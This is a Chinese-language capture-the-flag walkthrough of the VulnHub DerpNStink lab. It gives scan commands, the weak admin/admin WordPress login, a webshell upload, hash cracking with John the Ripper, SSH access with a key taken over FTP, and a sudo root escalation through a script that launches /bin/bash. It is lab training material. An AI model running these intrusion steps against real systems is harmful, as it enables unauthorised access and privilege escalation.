靶机下载地址
https://www.vulnhub.com/entry/derpnstink-1,221/
靶机配置
默认是桥接模式,切换为NAT模式后重启靶机
主机发现
arp-scan -l
端口扫描
nmap -sV -A -T4 192.168.229.158
访问网页
http://192.168.229.158/
目录扫描
python dirsearch.py -u http://192.168.229.158:80
拼接网页访问
http://192.168.229.158/robots.txt
http://192.168.229.158/php/phpmyadmin/
http://192.168.229.158/temporary
F12查看有没有有用的信息(此处找到一个flag)
flag
找到flag
查看head信息
dirb扫描目录
dirb "http://192.168.229.158:80"
拼接/weblog/wp-admin访问
http://192.168.229.158/weblog/wp-admin
存在弱口令
admin
admin
GETshell(此处找到两个flag)
寻找文件上传点
修改后点击图像
写入一句话木马成功
蚁剑连接
查找config.php文件
找到sql数据库账户密码
登录数据库
查找用户密码,发现是hash加密
kali解密
本人遇到的错误
解决办法
提供的哈希值 $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
看起来像是一个 phpBB、WordPress 或 Joomla 使用的哈希格式,通常称为 phpass
哈希。
要将它写入 hash.txt
文件并且让 John the Ripper 正确识别,你只需要将这个哈希值直接写入文件,每行一个哈希值。具体步骤如下:
1. 编辑 hash.txt
你可以使用任何文本编辑器(例如 nano
或 vim
)打开或创建 hash.txt
文件,并将哈希值粘贴进去:
bash
复制代码
nano hash.txt
在 nano
编辑器中,直接写入以下内容:
shell
复制代码
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
保存并退出。
2. 使用 John the Ripper 破解
John the Ripper 应该可以自动识别这个哈希格式,你可以使用以下命令来尝试破解它:
bash
复制代码
john hash.txt --wordlist=rockyou.txt
如果 John 无法自动识别该格式,你可以明确指定 phpass
哈希格式:
bash
复制代码
john --format=phpass hash.txt --wordlist=rockyou.txt
这样 John 就会识别并尝试破解该哈希。
john --format=phpass hash.txt --wordlist=rockyou.txt
登录用户,查找flag,发现第二个
继续探索,到家目录下,发现了两个用户 stinky 和 mrderp
FTP获取密钥
21和22端口开放,尝试ssh失败,需要密钥
尝试ftp连接,尝试使用刚刚获取到的密码wedgie57登录stinky用户,登录成功
ls
cd files
cd ssh
一直cd ssh知道查找到key.txt文件
然后使用get key.txt将其下载到本地
修改key.txt文件权限,利用key.txt进行ssh连接
chmod 700 key.txt
ssh -i key.txt stinky@192.168.229.158
如果证书失效了,在后面加上-o PubkeyAcceptedKeyTypes=+ssh-rsa
ssh -i key.txt stinky@192.168.229.158 -o PubkeyAcceptedKeyTypes=+ssh-rsa
密码就是wedgie57
登录成功
cd desktop
找到第三个flag
然后我们去找流量包,在Documents目录下发现derpissues.pcap,开启服务,wireshark开启抓包,kali下载文件
ls
ls -al
python -m http.server
wget http://192.168.229.158:8000/derpissues.pcap
查看为wireshark
获得mrderp密码:
derpderpderpderpderpderpderp
提权
ssh连接
ssh mrderp@192.168.229.158
查看如何提权
sudo -l
如果不存在目录和文件就自己创建目录和文件,并赋予文件权限,并执行,即可提权成功
mkdir binaries
cd binaries/
echo '/bin/bash' > derpy.sh
ls -al
chmod 777 derpy.sh
sudo ./derpy.sh
id
whoami